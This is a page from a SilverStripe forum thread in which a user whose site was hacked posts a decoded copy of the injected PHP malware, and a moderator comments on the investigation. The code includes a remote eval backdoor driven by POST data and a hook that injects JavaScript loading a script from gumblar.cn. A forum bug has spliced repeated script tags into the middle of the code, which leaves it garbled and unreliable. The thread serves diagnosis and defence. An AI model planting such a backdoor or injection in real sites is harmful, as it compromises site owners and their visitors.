Jump to:

1842 Posts in 1600 Topics by 558 members

Blog Module

SilverStripe Forums » Blog Module » BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/

Discuss the Blog Module.

Moderators: martimiz, Sean, biapar, Willr, Ingo, swaiba, simon_w

Page: 1 2 3
Go to End
Author Topic: 7615 Views
  • Ingo
    Avatar
    Forum Moderator
    801 Posts

    Re: BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/ Link to this post

    > I also discovered that all the HTML files outside the Silverstripe installation had also been modified on the same date, as well as a the javascript ".js" files

    Hm, could be a sign that the actual hack came from somewhere else, although not a very strong indicator. I've looked through the log files provided by Hugo in the timeframe in question (both apache access and error), nothing suspicious comes up. The server is a shared environment, so others installed applications might have been the cause of the hack, its hard to tell. For now, thats all we can do - we can't find any direct evidence that the hack was caused by a SilverStripe vulnerability.

  • stayatplay
    Avatar
    Community Member
    13 Posts

    Re: BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/ Link to this post

    It's only shared insofar as other web sites hosted by Hostway are likely on the same machine. Each account is completely separate from any other.

    The only large, complex software installed is Silverstripe, the hack happened shortly after I installed it. Silverstripe malfunctioned while I was online using it, which is why I noticed the hack happening. Likely that the html files and the rest were changed by a script - the same script that php files in Silverstripe were propagating since everything has the same date/time for the modified date.

    Someone good at php has to look at the php code and analyze what it actually does, I decoded some of it below, making it easier to read.

    The javascript injected directs clients to that web site in China - maybe to make a "map" of ip addresses of exploitable non Windows Vista machines for a botnet for example. It's highly unlikely that it was something outside of Silverstripe causing this first since Silverstripe is the only complex PHP code that was compromised and it includes the ability to write on the server.

    Here is the HACK of the php code in Silverstripe - easier to read.

    <?php

       if( !function_exists('--THE_HACK--') )
       {
          
             if(isset($_POST['--THE_HACK_NR_3--'])) eval($_POST['--THE_HACK_NR_3--']);
             
             
             if(!defined('--THE_JAVASCRIPT_HACK--')) define
                (
                   '--THE_JAVASCRIPT_HACK--',
                   
                   "
                      <script language=javascript><!--
                      (
                         function(CqPA)
                         {
                                     // if using this browser combination Windows, but not Vista, (navigator.userAgent.indexOf("Win")>0) && (navigator.userAgent.indexOf("NT 6")<0)
                                     // and the cookie is not set, (&& (document.cookie.indexOf("miek=1")<0) )
                                     // Then write this once in the document...
                                     // <script src=//gumblar.cn/rss/?id=""><\/script>
                         }
                      )
                       --></script>
                   "
                
                 );
          
          
             function --THE_HACK--($s)
             {
             
                if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
                
                if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
                {
                
                   $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                   if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
                
                }
                
                
                $s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
                
                if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',--THE_JAVASCRIPT_HACK--.'\1',$s1);
                elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

             (function($) {
                $(document).ready(function() {
                   var popupElements = $('a.fancy');
                   if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
                });
             })(jQuery);
          

    //]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

             (function($) {
                $(document).ready(function() {
                   var popupElements = $('a.fancy');
                   if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
                });
             })(jQuery);
          

    //]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

             (function($) {
                $(document).ready(function() {
                   var popupElements = $('a.fancy');
                   if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
                });
             })(jQuery);
          

    //]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

             (function($) {
                $(document).ready(function() {
                   var popupElements = $('a.fancy');
                   if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
                });
             })(jQuery);
          

    //]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

             (function($) {
                $(document).ready(function() {
                   var popupElements = $('a.fancy');
                   if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
                });
             })(jQuery);
          

    //]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

             (function($) {
                $(document).ready(function() {
                   var popupElements = $('a.fancy');
                   if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
                });
             })(jQuery);
          

    //]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

             (function($) {
                $(document).ready(function() {
                   var popupElements = $('a.fancy');
                   if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
                });
             })(jQuery);
          

    //]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

             (function($) {
                $(document).ready(function() {
                   var popupElements = $('a.fancy');
                   if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
                });
             })(jQuery);
          

    //]]></script>'))$s=$s1.--THE_JAVASCRIPT_HACK--;
                return $g?gzencode($s):$s;
             
             }
          
          
             function --THE_HACK_NR_2--($a=0,$b=0,$c=0,$d=0)
             {
                
                $s=array();
                
                if($b&&$GLOBALS['--THE_JAVASCRIPT_HACK--'])call_user_func($GLOBALS['--THE_JAVASCRIPT_HACK--'],$a,$b,$c,$d);
                foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='--THE_HACK--')return;
                else $s[]=array($a=='default output handler'?false:$a);
                
                for($i=count($s)-1;$i>=0;$i--)
                {
                   $s[$i][1]=ob_get_contents();
                   ob_end_clean();
                }
             
                ob_start('--THE_HACK--');
             
                for($i=0;$i<count($s);$i++)
                {
                ob_start($s[$i][0]);
                echo $s[$i][1];
                }
             
             }

       
       }

       if ( ($a=@set_error_handler('--THE_HACK_NR_2--'))!='--THE_HACK_NR_2--')
          $GLOBALS['--THE_JAVASCRIPT_HACK--']=$a;
       --THE_HACK_NR_2--();

    ?>

    <?php echo("\n"); ?>

  • stayatplay
    Avatar
    Community Member
    13 Posts

    Re: BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/ Link to this post

    Well ain't that funny... I just noticed that a whole bunch of silverstripe.org SERVER CODE is being spit into the comments I posted between the CODE tags... *THAT* is a bug, for sure.

    Look at these 3 forum pages and do a search for "silverstripe.org" so you can see what I mean.
    I didn't notice earlier because I had just posted the code, so I didn't read through it.

    But it's BAD news for Silverstripe.
    Glad we noticed it though, so it can be fixed.

    -Hugo.
    P.S. The actual HACK code in easier-to-read format is attached in this post.

    Attached Files
  • Ingo
    Avatar
    Forum Moderator
    801 Posts

    Re: BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/ Link to this post

    I've filed a ticket for the bug you discovered in the forum code - seems to be not very critical as it doesn't execute any serverside code, just includes markup in the wrong place that would show on the page anyway: http://open.silverstripe.com/ticket/4026. Let me know if you got any PHP or javascript code being executed in the "code" tag, because that would be quite a sensitive issue. Use security /at/ silverstripe /dot/ com for this.

    > Someone good at php has to look at the php code and analyze what it actually does, I decoded some of it below, making it easier to read.

    While thats good to see what the attack actually does, its not helpful to find out how this code got there in the first place. We couldn't find anything relating to this in the logs, so posting the attack code won't help us in the investigation, sorry.

    7615 Views
Page: 1 2 3
Go to Top

Want to know more about the company that brought you SilverStripe? Then check out SilverStripe.com

Comments on this website? Please give feedback.